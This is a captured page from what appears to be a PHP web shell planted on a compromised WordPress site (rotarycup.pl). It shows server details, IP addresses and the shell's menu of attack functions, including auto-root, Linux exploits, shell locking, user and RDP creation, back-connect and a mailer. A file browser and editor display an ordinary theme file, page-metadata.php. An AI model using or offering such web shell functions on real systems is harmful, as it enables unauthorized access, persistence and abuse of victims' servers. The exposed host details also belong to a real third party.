FreeBSD s15.mydevil.net 14.1-RELEASE-p4 FreeBSD 14.1-RELEASE-p4 #3 releng/14.1-n267709-86d01789bf41-dirty: Thu Sep 5 04:26:54 CEST 2024 root@pkg1.admin.net.pl:/usr/obj/usr/src/amd64.amd64/sys/devil amd64
Apache/N-G-I-N-X-htaccess-support
: 128.204.218.142 | : 18.118.37.209
Cant Read [ /etc/named.conf ]
?8.1.30
art
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
home /
art /
domains /
rotarycup.pl /
public_html /
wp-content /
themes /
sportcenter /
inc /
meta /
[ HOME SHELL ]
Name
Size
Permission
Action
meta-boxes.php
145
B
-rw-r--r--
page-metadata.php
2.22
KB
-rw-r--r--
post-metadata.php
6.27
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : page-metadata.php
<?php add_action( 'admin_init', 'leafcolor_page_meta_boxes' ); if ( ! function_exists( 'leafcolor_page_meta_boxes' ) ){ function leafcolor_page_meta_boxes() { $theme_uri = get_template_directory_uri(); //layout $page_meta_box_layout = array( 'id' => 'page_layout', 'title' => 'Layout settings', 'pages' => array( 'page' ), 'context' => 'normal', 'priority' => 'high', 'fields' => array( array( 'id' => 'page_sidebar_layout', 'label' => esc_html__('Sidebar','sportcenter'), 'desc' => esc_html__('Select "Default" to use Theme Options','sportcenter'), 'std' => '', 'type' => 'radio-image', 'choices' => array( array( 'value' => '', 'label' => esc_html__('Default','sportcenter'), 'src' => $theme_uri.'/images/options/layout-default.png' ), array( 'value' => 'right', 'label' => esc_html__('Sidebar Right','sportcenter'), 'src' => $theme_uri.'/images/options/layout-right.png' ), array( 'value' => 'left', 'label' => esc_html__('Sidebar Left','sportcenter'), 'src' => $theme_uri.'/images/options/layout-left.png' ), array( 'value' => 'full', 'label' => esc_html__('Hidden','sportcenter'), 'src' => $theme_uri.'/images/options/layout-full.png' ), ) ), array( 'id' => 'header_content', 'label' => esc_html__('Custom Header Content','sportcenter'), 'desc' => esc_html__('Enter header content or shortcodes','sportcenter'), 'std' => '', 'type' => 'textarea', ), array( 'id' => 'heading_bg', 'label' => esc_html__('Heading Background','conferencepro'), 'desc' => esc_html__('Upload Custom Heading Background Image','conferencepro'), 'std' => '', 'type' => 'background', 'class' => '', 'choices' => array() ), ) ); ot_register_meta_box( $page_meta_box_layout ); } }
Close